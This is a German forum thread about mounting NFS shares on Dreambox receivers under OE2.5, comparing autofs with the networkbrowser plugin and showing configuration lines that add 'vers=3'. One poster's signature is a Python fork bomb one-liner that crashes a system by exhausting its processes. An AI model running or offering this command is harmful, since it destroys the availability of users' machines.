OE2.5: autofs oder networkbrowser?

    • OE2.5: autofs oder networkbrowser?

      Ich mache hier mal ein neues Thema auf, da es ja unter OE2.5 Meinungsverschiedenheiten zu geben scheint, ob jetzt autofs oder networkbrowser das bessere Mittel der Wahl zum mounten der Netzwerkfreigaben ist.
      Ich habe nach Flashen des OE2.5 die Settings restored und automount funktioniert unter 2.5 weiterhin problemlos. Da gutemine unter OE2.5 den networkbrowser bevorzugt, habe ich den jetzt auch nachinstalliert. Nach Aufruf findet der networkbrowser zwar NAS, Fritz und meinen PC, aber meine DM8000 nicht, obwohl die über automount mit NFS gemountet und erreichbar ist.
      Auch frage ich mich, wie die mounts über den networkbrowser bei ausgeschalteter Freigabe reagieren.
      Bevor ich jetzt weiter den networkbrowser teste, hoffe ich mal auf einige Rückmeldungen.
    • Ich sagte dir doch bereits das bei OE2.0 und OE2.5 unterschiedliche NFS Versionen verwendet werden und wenn du einen 'alten' NFS server mounten willst ein vers=3.0 bei den Mount Optionen auf der OE2.5 Box dazu tun wirst müssen.

      Bei native OE2.5 untereinander brauchst du das nicht ... weswegen die automounts.xml diese eben auch NICHT beinhaltet.
    • gutemine wrote:

      und wenn du einen 'alten' NFS server mounten willst ein vers=3.0 bei den Mount Optionen auf der OE2.5 Box dazu tun wirst müssen.
      Aber das war doch schon immer so und ist bekannt. Deshalb ist schon immer auf der DM7080 mit OE2.2 in der automounts.xml das vers=3 beim mount der DM8000 dabei und funktioniert jetzt auch nach restoren auf der DM7080 mit OE2.5 nach wie vor. Ohne vers=3 würde es ja auch garnicht funktionieren.
      Mir fehlen immer noch die Argumente für den Umstieg auf den networkbrowser.
    • Das 2.5 läuft zu meiner vollen Zufriedenheit.
      VideoDB fehlt noch, aber das benutze ich sowieso nur sporadisch.
      Fremdplugins habe ich dbackup, foreca, lottoextended, mediaportal, merlinskinthemes, secondinfobar, skyrecorder und valisepg, läuft alles ohne Probleme. Und der Umstieg funktionierte auch reibungslos, NN2 flashen, Plugins nachinstallieren und Sicherung zurückspielen.
      Der Unterschied 2.2 zu 2.5 ist für mich so wie vorher der Unterschied zwischen stable und daily, also sehr gering.
    • Bei NFS wahr schon immer da das Problem das Server und Client die selbe Protokoll version unterstützen müssen sonst ist ein einbinden nur bedingt möglich.
      Bei OE2.5 untereinander ist es halt NFSv4 wenn man zuhause nur Boxen hatt mit OE2.5 bzw andere geräte die NFSv4 verwenden ist das kein problem dann muss man auch keine version angeben.
      Aber sobald man einen alten nfs server oder client hatt und den einbinden will wird das ohne angeben von versionen nicht gehen.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • kati910 wrote:

      Aber sobald man einen alten nfs server oder client hatt und den einbinden will wird das ohne angeben von versionen nicht gehen.
      Wo gebe ich den die Version an ?

      Ich weiss ja nicht welche Version mein NAS hat aber da ich mit dem Netzwerkbrowser beim herstellen eine verbindung ein spinner bekomme denke ich mal das der QNAP eine V3 verwendet und OE2.5 ebend 4 aber wo gebe ich den beim herstellen der verbindung an das V3 benutz werden soll ?
      Mfg Digi-Bit
    • Wenn du mit der /etc/auto.network mountest, kommt dort "vers=3" rein. Meine mounts der QNAP-Freigaben in der auto.network sehen so aus:

      Source Code

      1. Filme -fstype=nfs,rw,soft,tcp,nolock,async,retry=0,vers=3 192.168.178.10:/Filme_Dreambox
      2. Sonstiges -fstype=nfs,rw,soft,tcp,nolock,async,retry=0,vers=3 192.168.178.10:/Sonstiges
    • in der automounts.xml kannst du genauso das vers=3.0 bei den Optionen dazu schreiben und dann evt. auch in der fstab, dann ist das kein Problem auch alte Boxen oder NAS mit NFS3 zu mounten, genauso wie vorher.

      Und NOCHMALS der Netzwerkbrauser geht gar nicht ist eine FALSCHE Aussage, der funktioniert genauso gut/schlecht wie vorher auch, wenn dir die Default einstellungen nicht passen musste man vorher genauso von Hand nacharbeiten ....

      Nachdem jetzt aber eben KEIN autofs mehr von Ihm verwendet wird kannst du eben NICHT mehr so einfach mischen sondern solltest dich entscheiden was du verwendest.
    • gutemine wrote:

      in der automounts.xml kannst du genauso das vers=3.0 bei den Optionen dazu schreiben und dann evt. auch in der fstab, dann ist das kein Problem auch alte Boxen oder NAS mit NFS3 zu mounten, genauso wie vorher.

      Und NOCHMALS der Netzwerkbrauser geht gar nicht ist eine FALSCHE Aussage, der funktioniert genauso gut/schlecht wie vorher auch, wenn dir die Default einstellungen nicht passen musste man vorher genauso von Hand nacharbeiten ....

      Nachdem jetzt aber eben KEIN autofs mehr von Ihm verwendet wird kannst du eben NICHT mehr so einfach mischen sondern solltest dich entscheiden was du verwendest.
      Hi,

      Ich habe noch nie gemischt !
      Ich habe nur die automounts.xml und Netzwerkbroser immer benutz !

      wo gebe ich den bei der automounts.xml die version genau an den das würde ich vorziehen !



      <?xml version="1.0" encoding="UTF-8"?>
      <mountmanager>
      <nfs>
      <mount>
      <active>True</active>
      <hdd_replacement>False</hdd_replacement>
      <ip>192.168.1.157</ip>
      <sharename>QNAP</sharename>
      <sharedir>Multimedia</sharedir>
      <options>rw,nolock,tcp</options>
      </mount>
      </nfs>
      </mountmanager>

      So sieht die momentan aus.

      ein fach so ?

      <?xml version="1.0" encoding="UTF-8"?>
      <mountmanager>
      <nfs>
      <mount>
      <active>True</active>
      <hdd_replacement>False</hdd_replacement>
      <ip>192.168.1.157</ip>
      <sharename>QNAP</sharename>
      <sharedir>Multimedia</sharedir>
      <options>rw,nolock,tcp,vers=3.0</options>
      </mount>
      </nfs>
      </mountmanager>
      Mfg Digi-Bit